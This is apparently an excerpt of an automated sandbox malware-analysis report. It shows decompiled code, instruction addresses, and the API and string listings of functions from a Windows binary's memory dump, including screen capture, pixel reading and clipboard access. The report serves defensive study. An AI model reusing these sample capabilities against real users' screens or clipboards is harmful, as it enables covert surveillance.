								return L00439200(_a4, __eflags, _t604, "2", 0, 0x4ae8f8);
							} else {
								_push(1);
								_push(0);
								_push(0xffffffff);
								_push("2");
								_push( *0x4d7f00);
								return L004817E0(_t604);
							}
						} else {
							_t389 =  *_t551 & 0x0000ffff;
							__eflags = _t389;
							while(_t389 != 0) {
								_t528 = _t389 & 0x0000ffff;
								_t479 = L" \t";
								_t390 = 0x20;
								while(1) {
									__eflags = _t528 - _t390;
									if(_t528 == _t390) {
										break;
									}
									_t58 =  &(_t479[2]); // 0x9
									_t390 =  *_t58 & 0x0000ffff;
									_t479 =  &(_t479[2]);
									__eflags = _t390;
									if(_t390 != 0) {
										continue;
									} else {
										goto L76;
									}
									goto L202;
								}
								_t429 = _t551 + 2;
								_t391 = _t429;
								while(1) {
									_t480 =  *_t391 & 0x0000ffff;
									__eflags = _t480 - 0x20;
									if(_t480 == 0x20) {
										goto L82;
									}
									L81:
									__eflags = _t480 - 9;
									if(_t480 == 9) {
										goto L82;
									}
									goto L83;
									L82:
									_t391 =  &(_t391[1]);
									_t480 =  *_t391 & 0x0000ffff;
									__eflags = _t480 - 0x20;
									if(_t480 == 0x20) {
										goto L82;
									}
									goto L81;
								}
								L76:
								_t389 =  *(_t551 + 2) & 0x0000ffff;
								_t551 = _t551 + 2;
								__eflags = _t389;
							}
							goto L77;
						}
						goto L202;
						L83:
						__eflags =  *_t391 - 0x2a;
						_t538 = _t391;
					} while ( *_t391 == 0x2a);
					goto L84;
				}
				L202:
			}

0x00443710
0x00443716
0x0044371f
0x0044372b
0x0044372c
0x0044372e
0x00443734
0x00443735
0x0044373c
0x00443745
0x00443747
0x00443747
0x0044374e
0x00443752
0x00443752
0x00443757
0x00443763
0x00443765
0x00443767
0x0044376a
0x0044376e
0x00443775
0x00443777
0x0044377d
0x00443783
0x00443794
0x004437b0
0x004437b4
0x004437bb
0x004437c2
0x00443796
0x004437a0
0x004437a0
0x004437ca
0x004437cc
0x004437d0
0x004437d7
0x004437db
0x004437db
0x004437ca
0x00443783
0x004437df
0x004437e2
0x004437e5
0x004437e8
0x004437eb
0x004437f3
0x004437f7
0x004437ff
0x00443803
0x00443807
0x00443810
0x00443812
0x00443817
0x00443819
0x00443822
0x00443827
0x0044382c
0x00443852
0x0044385e
0x00443864
0x0044382e
0x00443834
0x00443839
0x0044383e
0x00000000
0x00443840
0x00443846
0x0044384b
0x00443850
0x00000000
0x00000000
0x00443850
0x0044383e
0x0044382c
0x00443868
0x00443870
0x00443870
0x00443876
0x0044387d
0x00000000
0x0044387d
0x00443882
0x00443886
0x00443b62
0x00443b66
0x00443b6c
0x00443b71
0x00443b73
0x00443b7c
0x00443b7d
0x00443b7e
0x00443b7f
0x00443b85
0x00443b87
0x00443b8a
0x00443b8e
0x00443b90
0x00000000
0x00443b96
0x00443b98
0x00443b9e
0x00443ba0
0x00443ba4
0x00443ba6
0x00443bd8
0x00443bdd
0x00443be1
0x00443be5
0x00443be9
0x00443bed
0x00443bf1
0x00443bf5
0x00443c5c
0x00443c70
0x00443c75
0x00443c78
0x00443c7c
0x00443c7e
0x00443eb7
0x00443eb7
0x00443c84
0x00443c95
0x00443c96
0x00443c9d
0x00443c9f
0x00443ca3
0x00443ca5
0x00000000
0x00443cab
0x00443cb2
0x00443cb8
0x00443cbc
0x00443cbe
0x00000000
0x00443cc4
0x00443cc8
0x00443cce
0x00443cd2
0x00443cd4
0x00000000
0x00443cda
0x00443cf3
0x00443cf9
0x00443cfb
0x00000000
0x00443d01
0x00443d1e
0x00443d20
0x00443d23
0x00443d27
0x00443d29
0x00000000
0x00443d2f
0x00443d37
0x00443d3c
0x00443d41
0x00443d46
0x00443d4a
0x00443d4e
0x00443d57
0x00443d57
0x00443d5c
0x00443d5e
0x00443d5e
0x00443d5e
0x00443d5e
0x00443d66
0x00443d68
0x00443d6a
0x00443d70
0x00443d70
0x00443d77
0x00443d78
0x00443d78
0x00443d70
0x00443d7c
0x00443d80
0x00443d82
0x00443d84
0x00443d86
0x00443d86
0x00443d8d
0x00443d8e
0x00443d8e
0x00000000
0x00443d92
0x00443d50
0x00443d50
0x00443d55
0x00443d94
0x00443d98
0x00443d98
0x00443d9a
0x00443d9c
0x00443da0
0x00443da0
0x00443da3
0x00443da6
0x00443da6
0x00443da6
0x00443da0
0x00000000
0x00000000
0x00000000
0x00443d55
0x00443da9
0x00443dad
0x00443db0
0x00443f79
0x00443f7b
0x00443f7f
0x00443f81
0x00443f87
0x00443f87
0x00443f89
0x00443f8a
0x00443f94
0x00443f98
0x00000000
0x00443f9e
0x00443fa4
0x00443fa8
0x00000000
0x00443fae
0x00443fb0
0x00443fb5
0x00443fb9
0x00443fbd
0x00443fc1
0x00443fc5
0x00443fd6
0x00443fd6
0x00443fd8
0x00443fdd
0x00443fe1
0x00443fe5
0x00443ff0
0x00443ff0
0x00443ff4
0x00443ff7
0x00443ff9
0x00444004
0x00444004
0x00444006
0x00443ffb
0x00443ffb
0x00443ffb
0x0044400a
0x0044400d
0x00444011
0x00444013
0x0044401c
0x00444022
0x00444022
0x00444026
0x00444015
0x00444015
0x00444015
0x0044402a
0x0044402d
0x0044402f
0x0044403a
0x0044403a
0x0044403e
0x00444042
0x00444031
0x00444031
0x00444031
0x00444046
0x00444051
0x00444053
0x00444060
0x00444060
0x00444062
0x00444066
0x00444055
0x00444055
0x0044405a
0x0044405a
0x0044406f
0x00444071
0x00444079
0x00444079
0x0044407b
0x00444073
0x00444073
0x00444073
0x00444083
0x00444085
0x0044408d
0x0044408d
0x0044408f
0x00444087
0x00444087
0x00444087
0x00444093
0x00444097
0x0044409b
0x0044409f
0x004440a3
0x004440a6
0x004440aa
0x00000000
0x00000000
0x004440ac
0x004440ac
0x004440b0
0x00000000
0x004440b2
0x004440b2
0x004440b6
0x00000000
0x004440b8
0x004440b8
0x004440bc
0x00000000
0x004440be
0x004440be
0x004440c2
0x00000000
0x004440c4
0x004440c4
0x004440c8
0x004440e3
0x004440e7
0x004440e8
0x004440ec
0x004440f0
0x004440f9
0x00444104
0x0044410c
0x0044410c
0x0044410e
0x00444116
0x0044411a
0x004440f2
0x004440f3
0x004440f3
0x00444122
0x00444123
0x00444126
0x0044412a
0x0044412e
0x00000000
0x00444134
0x00444134
0x00443ff0
0x00443ff4
0x00443ff7
0x00443ff9
0x00444004
0x00444004
0x00444006
0x00443ffb
0x00443ffb
0x00443ffb
0x0044400a
0x0044400d
0x00444011
0x00444013
0x0044401c
0x00444022
0x00444022
0x00444026
0x00444015
0x00444015
0x00444015
0x0044402a
0x0044402d
0x0044402f
0x0044403a
0x0044403a
0x0044403e
0x00444042
0x00444031
0x00444031
0x00444031
0x00444046
0x00444051
0x00444053
0x00444060
0x00444060
0x00444062
0x00444066
0x00444055
0x00444055
0x0044405a
0x0044405a
0x0044406f
0x00444071
0x00444079
0x00444079
0x0044407b
0x00444073
0x00444073
0x00444073
0x00444083
0x00444085
0x0044408d
0x0044408d
0x0044408f
0x00444087
0x00444087
0x00444087
0x00444093
0x00444097
0x0044409b
0x0044409f
0x004440a3
0x004440a6
0x004440aa
0x00000000
0x00000000
0x004440aa
0x00000000
0x00000000
0x00000000
0x004440c8
0x004440c2
0x004440bc
0x004440b6
0x00000000
0x004440ca
0x004440ca
0x004440cf
0x004440db
0x004440df
0x004440e1
0x0044413d
0x00444141
0x00444145
0x00444149
0x00000000
0x00000000
0x00000000
0x00000000
0x004440d1
0x004440d1
0x004440d5
0x004440d9
0x00000000
0x00000000
0x00000000
0x00000000
0x004440d9
0x00000000
0x004440cf
0x00443ff0
0x00443fc5
0x00443fa8
0x00000000
0x0044414e
0x0044414e
0x0044414f
0x00444153
0x00444153
0x00443f87
0x00000000
0x00443db6
0x00443db6
0x00443db8
0x00443dba
0x00443dba
0x00443dbd
0x00443dc0
0x00443dc0
0x00443dc3
0x00443dc6
0x00443dc6
0x00443dc6
0x00443dc0
0x00443dc9
0x00443dcb
0x00443dcf
0x00443dd1
0x0044415d
0x00444163
0x00444165
0x00444167
0x00444169
0x0044416e
0x0044416f
0x00443dd7
0x00443dd7
0x00443dd9
0x00443de0
0x00443de0
0x00443de4
0x00443deb
0x00443dee
0x00443e07
0x00443e07
0x00443e0b
0x00443e0d
0x00443e0e
0x00443e16
0x00443e1a
0x00443f61
0x00443f61
0x00000000
0x00443e20
0x00443e22
0x00443e26
0x00000000
0x00443e2c
0x00443e2c
0x00443e30
0x00443e32
0x00443e37
0x00443e3b
0x00443e3f
0x00443e45
0x00443e4d
0x00443e4d
0x00443e4f
0x00443e54
0x00443e56
0x00443e5a
0x00443e60
0x00443e60
0x00443e62
0x00443e66
0x00443e69
0x00000000
0x00443e6b
0x00443e6b
0x00443e70
0x00443e7c
0x00443e7c
0x00443e80
0x00443f58
0x00443f5c
0x00000000
0x00000000
0x00000000
0x00000000
0x00443e72
0x00443e72
0x00443e76
0x00443e7a
0x00000000
0x00000000
0x00000000
0x00000000
0x00443e7a
0x00443e70
0x00000000
0x00443e86
0x00443e86
0x00443e87
0x00443e8b
0x00443e90
0x00443e9b
0x00443e9f
0x00443ea1
0x00443ea1
0x00443ea3
0x00443e8d
0x00443e8d
0x00443e8d
0x00443ea9
0x00443eaa
0x00443ead
0x00443eb1
0x00443eb1
0x00000000
0x00443e60
0x00443e3f
0x00443e26
0x00443df0
0x00443df0
0x00443df4
0x00443df6
0x00443dfd
0x00443dfd
0x00443e01
0x00000000
0x00000000
0x00000000
0x00000000
0x00443df8
0x00443df8
0x00443dfb
0x00000000
0x00000000
0x00000000
0x00000000
0x00443dfb
0x00443df6
0x00000000
0x00443f65
0x00443f65
0x00443f66
0x00443f6a
0x00443f6a
0x00000000
0x00443f74
0x00443dd1
0x00443db0
0x00443d29
0x00443cfb
0x00443cd4
0x00443cbe
0x00443ca5
0x00443ebb
0x00443ec2
0x00443ec8
0x00443ecd
0x00443ed4
0x00443ed4
0x00443eda
0x00443ede
0x00443ee0
0x00443ee2
0x00443ee6
0x00443ee8
0x00443eec
0x00443eec
0x00443ef3
0x00443ef3
0x00443ef9
0x00443efd
0x00443eff
0x00443f02
0x00443f02
0x00443f08
0x00443f0c
0x00443f0e
0x00443f11
0x00443f16
0x00443f16
0x00443f19
0x00443f1d
0x00443f1f
0x00443f22
0x00443f27
0x00443f27
0x00443f2a
0x00443f2e
0x00443f30
0x00000000
0x00443f36
0x00443f37
0x00443f3f
0x00443f44
0x00444179
0x00444180
0x00444182
0x00444186
0x00444193
0x00444196
0x0044419b
0x0044419b
0x004441a0
0x004441a7
0x004441a9
0x004441ad
0x004441b8
0x004441bb
0x004441c0
0x004441c0
0x004441cb
0x004441cd
0x004441cf
0x004441d1
0x004441d6
0x004441e2
0x00443f4a
0x00443f55
0x00443f55
0x00443f44
0x00443bf7
0x00443c00
0x00443c06
0x00443c08
0x00443c25
0x00443c31
0x00443c35
0x00443c39
0x00443c43
0x00443c43
0x00443c46
0x00443c4b
0x00443c4d
0x00443c50
0x00443c54
0x00443c56
0x00000000
0x00000000
0x00000000
0x00000000
0x00443c56
0x00443ba8
0x00443ba8
0x00443bac
0x00443bb2
0x00443bb7
0x00443bb8
0x00443bc5
0x00443bba
0x00443bba
0x00443bba
0x00443bb8
0x00000000
0x00443bac
0x00443ba6
0x0044388c
0x0044388c
0x00443890
0x00443899
0x0044389c
0x0044389f
0x004438a2
0x00443a5e
0x00443a61
0x00443a63
0x00443a63
0x00443a66
0x00443a69
0x00000000
0x00000000
0x00443a6b
0x00443a6b
0x00443a6e
0x00000000
0x00000000
0x00443a75
0x00443a78
0x00443a7b
0x00443ac2
0x00443ac2
0x00443ac8
0x00000000
0x00443a7d
0x00443a7d
0x00443a80
0x00443a87
0x00443a87
0x00443a87
0x00443a82
0x00443a82
0x00443a85
0x00000000
0x00000000
0x00443a85
0x00443a8a
0x00443a8e
0x00000000
0x00443a90
0x00443a90
0x00443a94
0x00443a97
0x00443a9e
0x00443aa3
0x00443aa8
0x00443aab
0x00443aad
0x00000000
0x00443aaf
0x00443ab4
0x00443ab9
0x00443abc
0x00443abc
0x00443a99
0x00443a99
0x00443a9c
0x00000000
0x00000000
0x00000000
0x00000000
0x00443a9c
0x00443a97
0x00443a8e
0x00000000
0x00443a70
0x00443a70
0x00443a63
0x00443a66
0x00443a69
0x00000000
0x00000000
0x00000000
0x00443a69
0x004438a8
0x004438a8
0x004438ab
0x004439eb
0x004439ee
0x004439f0
0x004439f0
0x004439f3
0x004439f6
0x00000000
0x00000000
0x004439f8
0x004439f8
0x004439fb
0x00000000
0x00000000
0x00443a02
0x00443a05
0x00443a08
0x00443a52
0x00443a52
0x00443a58
0x00000000
0x00443a0a
0x00443a0a
0x00443a0d
0x00443a14
0x00443a14
0x00443a14
0x00443a0f
0x00443a0f
0x00443a12
0x00000000
0x00000000
0x00443a12
0x00443a17
0x00443a1b
0x00000000
0x00443a1d
0x00443a1d
0x00443a21
0x00443a24
0x00443a2b
0x00443a30
0x00443a35
0x00443a38
0x00443a3a
0x00000000
0x00443a3c
0x00443a41
0x00443a46
0x00443a49
0x00443a49
0x00443a26
0x00443a26
0x00443a29
0x00000000
0x00000000
0x00000000
0x00000000
0x00443a29
0x00443a24
0x00443a1b
0x00000000
0x004439fd
0x004439fd
0x004439f0
0x004439f3
0x004439f6
0x00000000
0x00000000
0x00000000
0x004439f6
0x004438b1
0x004438b9
0x004438be
0x004438c1
0x004438c3
0x00443900
0x00443905
0x00443908
0x0044390a
0x00443999
0x0044399e
0x004439a0
0x004439b5
0x004439b6
0x004439bb
0x004439be
0x004439a2
0x004439a7
0x004439ac
0x004439af
0x004439af
0x004439c2
0x004439c4
0x004439d3
0x004439d8
0x004439de
0x004439de
0x004439c6
0x004439c6
0x004439c6
0x00443910
0x00443912
0x0044391e
0x00443925
0x00443934
0x0044393c
0x00443941
0x00443943
0x00443945
0x00443947
0x00443947
0x00443951
0x00443956
0x00443959
0x0044398e
0x0044395b
0x00443962
0x00443967
0x0044396a
0x0044396a
0x00443959
0x004438c5
0x004438c5
0x004438ca
0x004438cf
0x004438d1
0x004438e9
0x004438ef
0x00443acc
0x00443acc
0x004438d3
0x004438d8
0x004438dd
0x004438e0
0x004438e0
0x004438d1
0x004438c3
0x004438ab
0x00443acf
0x00443acf
0x00443ad1
0x00443b0d
0x00443b0d
0x00443b12
0x00443b19
0x004441ff
0x00443b1f
0x00443b25
0x00443b27
0x00443b29
0x00443b2b
0x00443b30
0x00443b3c
0x00443b3c
0x00443ad3
0x00443ad3
0x00443ad6
0x00443ad9
0x00443ae0
0x00443ae3
0x00443ae8
0x00443af0
0x00443af0
0x00443af3
0x00000000
0x00000000
0x00443af5
0x00443af5
0x00443af9
0x00443afc
0x00443aff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00443aff
0x00443b3f
0x00443b42
0x00443b44
0x00443b44
0x00443b47
0x00443b4a
0x00000000
0x00000000
0x00443b4c
0x00443b4c
0x00443b4f
0x00000000
0x00000000
0x00000000
0x00443b51
0x00443b51
0x00443b44
0x00443b47
0x00443b4a
0x00000000
0x00000000
0x00000000
0x00443b4a
0x00443b01
0x00443b01
0x00443b05
0x00443b08
0x00443b08
0x00000000
0x00443ad9
0x00000000
0x00443b56
0x00443b56
0x00443b5a
0x00443b5a
0x00000000
0x0044388c
0x00000000

APIs

GetForegroundWindow.USER32 ref: 00443777
IsIconic.USER32 ref: 00443788
GetWindowRect.USER32 ref: 004437A0
ClientToScreen.USER32(?,?), ref: 004437C2
_wcsrchr.LIBCMT ref: 0044380B
__wcsicoll.LIBCMT ref: 00443822
__wcsicoll.LIBCMT ref: 00443834
__wcsicoll.LIBCMT ref: 00443846
GetSystemMetrics.USER32 ref: 0044385A
GetSystemMetrics.USER32 ref: 00443862
__wcsnicmp.LIBCMT ref: 004438B9
__fassign.LIBCMT ref: 004438D8

Part of subcall function 0049A69D: wcstoxl.LIBCMT ref: 0049A6AD

__wcsnicmp.LIBCMT ref: 00443900
_wcsncpy.LIBCMT ref: 0044391E
__fassign.LIBCMT ref: 00443962
__fassign.LIBCMT ref: 00443A41

Strings

Trans, xrefs: 004438FA
exe, xrefs: 0044382E
Icon, xrefs: 004438B3
dll, xrefs: 00443840
ico, xrefs: 0044381C

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __fassign__wcsicoll$MetricsSystemWindow__wcsnicmp$ClientForegroundIconicRectScreen_wcsncpy_wcsrchrwcstoxl
String ID: Icon$Trans$dll$exe$ico
API String ID: 1615180671-2549557054
Opcode ID: 3020855d233564eded3ce666ab3bbff6ba5656b1d9b39b858230c7690da27eb9
Instruction ID: 6bfb753d99f8b55bb8c7c100dd98952505c0236d6ae800fb793ae1746bcef11c
Opcode Fuzzy Hash: 3020855d233564eded3ce666ab3bbff6ba5656b1d9b39b858230c7690da27eb9
Instruction Fuzzy Hash: 7262F2719083419FE724CF288881B6BBBE0AFD5B05F14492FF48597381E778DA45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00442F00, Relevance: 39.2, APIs: 16, Strings: 6, Instructions: 699windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00442FF1
IsIconic.USER32 ref: 00443000
GetWindowRect.USER32 ref: 00443018
ClientToScreen.USER32(?,?), ref: 00443032
GetDC.USER32(00000000), ref: 004430DE
CreateCompatibleDC.GDI32(?), ref: 0044311D
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00443138
SelectObject.GDI32(00000000,00000000), ref: 0044314E
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0044317B
ReleaseDC.USER32 ref: 00443423
SelectObject.GDI32(?,?), ref: 0044343B
DeleteDC.GDI32(?), ref: 00443442
DeleteObject.GDI32(?), ref: 00443451
_free.LIBCMT ref: 00443467
GetPixel.GDI32(?,?,?), ref: 00443615
ReleaseDC.USER32 ref: 00443631

Strings

$%K, xrefs: 004434F1
RGB, xrefs: 00442F36
|*K, xrefs: 004434F8
0x%06X, xrefs: 00443204
$%K, xrefs: 004434CC
Fast, xrefs: 00442F1C

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Object$CompatibleCreateDeleteReleaseSelectWindow$BitmapClientForegroundIconicPixelRectScreen_free
String ID: $%K$$%K$0x%06X$Fast$RGB$|*K
API String ID: 3217577006-1039615630
Opcode ID: 104e2f1ca20d531e50e1de7099248ae2d734485f3398f42ef195bcabeb8bc0f6
Instruction ID: b832489d371c041b045b4e653bbe8b59abdb3408bfd683a2b0fd39d4f3bd2acb
Opcode Fuzzy Hash: 104e2f1ca20d531e50e1de7099248ae2d734485f3398f42ef195bcabeb8bc0f6
Instruction Fuzzy Hash: 0B32D63160C3919BE721CF28884476FBBE1ABC5B15F14496EF8D097382C678DE49C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004050A0, Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 74clipboardCOMMON

Download Yara Rule

APIs

GetClipboardFormatNameW.USER32(0000000D,00000104,00000104), ref: 004050CC
__wcsnicmp.LIBCMT ref: 004050DE
__wcsicoll.LIBCMT ref: 004050F7
__wcsicoll.LIBCMT ref: 0040510C
__wcsicoll.LIBCMT ref: 00405121
__wcsicoll.LIBCMT ref: 00405136
__wcsicoll.LIBCMT ref: 0040514B
__wcsicoll.LIBCMT ref: 00405160
GetClipboardData.USER32 ref: 00405186

Strings

Embed Source, xrefs: 00405130
ObjectLink, xrefs: 004050F1
Native, xrefs: 0040511B
OwnerLink, xrefs: 00405106
MSDEVLineSelect, xrefs: 0040515A
Link Source, xrefs: 004050D8
MSDEVColumnSelect, xrefs: 00405145

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll$Clipboard$DataFormatName__wcsnicmp
String ID: Embed Source$Link Source$MSDEVColumnSelect$MSDEVLineSelect$Native$ObjectLink$OwnerLink
API String ID: 3127108255-1844231336
Opcode ID: f4d25fb591d1f3ce3e3e7ae087564694b5004430154c508a06d909d1d9f1022c
Instruction ID: 9674a832bd9d4d3b88eae5f281089e51eaed792376d67bd0fc05c6a5212559fc
Opcode Fuzzy Hash: f4d25fb591d1f3ce3e3e7ae087564694b5004430154c508a06d909d1d9f1022c
Instruction Fuzzy Hash: 3111A570D0070166EB20E769CC42F2B76B99F52705F54493EBC58D52C1FBBCD908CAAA

Uniqueness

Uniqueness Score: -1.00%

Function 00441BF0, Relevance: 25.0, APIs: 8, Strings: 6, Instructions: 453windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C380: __wcsicoll.LIBCMT ref: 0041C39B
Part of subcall function 0041C380: __wcsicoll.LIBCMT ref: 0041C3B1

GetForegroundWindow.USER32 ref: 00441C69
IsWindowVisible.USER32(00000000), ref: 00441C84

Strings

GetLayeredWindowAttributes, xrefs: 00442028
Parameter #2 invalid., xrefs: 00441C25
0x%08X, xrefs: 00441FC2
user32, xrefs: 0044202D
0x%06X, xrefs: 004420A2
%s1, xrefs: 00441E53

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Window__wcsicoll$ForegroundVisible
String ID: %s1$0x%06X$0x%08X$GetLayeredWindowAttributes$Parameter #2 invalid.$user32
API String ID: 1910143062-141734719
Opcode ID: 2707bf492762912200931da546580752133d3f5ec8617d53d7f4bd15fef4bddc
Instruction ID: 530c671e4ffaeda0571d8dc57dadb6850290ce19da6ca584f5cf6ad845a231d0
Opcode Fuzzy Hash: 2707bf492762912200931da546580752133d3f5ec8617d53d7f4bd15fef4bddc
Instruction Fuzzy Hash: 68D129B27043055BE720DF69DC81F6B73D8AB84314F14492FFA45972D2D6B8EC8487AA

Uniqueness

Uniqueness Score: -1.00%

Function 00482630, Relevance: 19.7, APIs: 13, Instructions: 170threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0048264A

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: ProcessThreadWindow
String ID:
API String ID: 1653199695-0
Opcode ID: 58944f50833586f36ba9be8f837b8f62455600654445e545bb5531ab214cca7e
Instruction ID: 61371deae592dde2cd14fd0f047ae6ce1a60663bf9c60d1ea199075d8a991db5
Opcode Fuzzy Hash: 58944f50833586f36ba9be8f837b8f62455600654445e545bb5531ab214cca7e
Instruction Fuzzy Hash: 3E5129717443046BE720BF79AE85F6F7B949B85714F440C2BF900A6292FAF9D804876D

Uniqueness

Uniqueness Score: -1.00%

Function 004298E0, Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 434COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0042996A

Strings

Syntax error in class definition., xrefs: 00429B16
This class definition is nested too deep., xrefs: 004298FB
Duplicate class definition., xrefs: 00429C8B
Missing class name., xrefs: 004299AC
Full class name is too long., xrefs: 00429C13
Invalid class name., xrefs: 00429A12
__Class, xrefs: 00429AD8, 00429D37
Out of memory., xrefs: 00429DA0
extends, xrefs: 00429964

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsnicmp
String ID: Duplicate class definition.$Full class name is too long.$Invalid class name.$Missing class name.$Out of memory.$Syntax error in class definition.$This class definition is nested too deep.$__Class$extends
API String ID: 1038674560-3763243221
Opcode ID: fbac963eb31dfa9f8c7a9efce87d2cfcef415ec326c8d55011db082736a78650
Instruction ID: b26c900200e128723019bcc8d352144299443d9aff797ebe8a880d575c8d1fc8
Opcode Fuzzy Hash: fbac963eb31dfa9f8c7a9efce87d2cfcef415ec326c8d55011db082736a78650
Instruction Fuzzy Hash: A0E1E0717042119FC724DF19E880AAABBE0FF89314F54846FE8498B351D778ED85CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00415980, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 131COMMON

Download Yara Rule

Strings

@, xrefs: 00415A47
wM, xrefs: 00415A97

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID:
String ID: wM$@
API String ID: 0-243138201
Opcode ID: aa0e1f95e85ddbf410703dd63ca8b65f5c809bdf182f3a2141991053ca0f1473
Instruction ID: b2217932d5080b3ee1baa7b9524af4ae239ab55fb334c0922ca75d2371870aed
Opcode Fuzzy Hash: aa0e1f95e85ddbf410703dd63ca8b65f5c809bdf182f3a2141991053ca0f1473
Instruction Fuzzy Hash: 67412C3039CBD0A5F72053649C527EB6F905FC1754F58C06BE6C40B2C2E6A89884D76F

Uniqueness

Uniqueness Score: -1.00%

Function 00446070, Relevance: 15.2, APIs: 10, Instructions: 221windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004460B8
GetForegroundWindow.USER32 ref: 004460E0
IsIconic.USER32 ref: 004460EF
GetWindowRect.USER32 ref: 00446107
ClientToScreen.USER32(?,?), ref: 00446135
WindowFromPoint.USER32(?,?), ref: 00446199
_memset.LIBCMT ref: 00446206
EnumChildWindows.USER32 ref: 00446229
GetClassNameW.USER32 ref: 0044627A
EnumChildWindows.USER32 ref: 0044629C

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

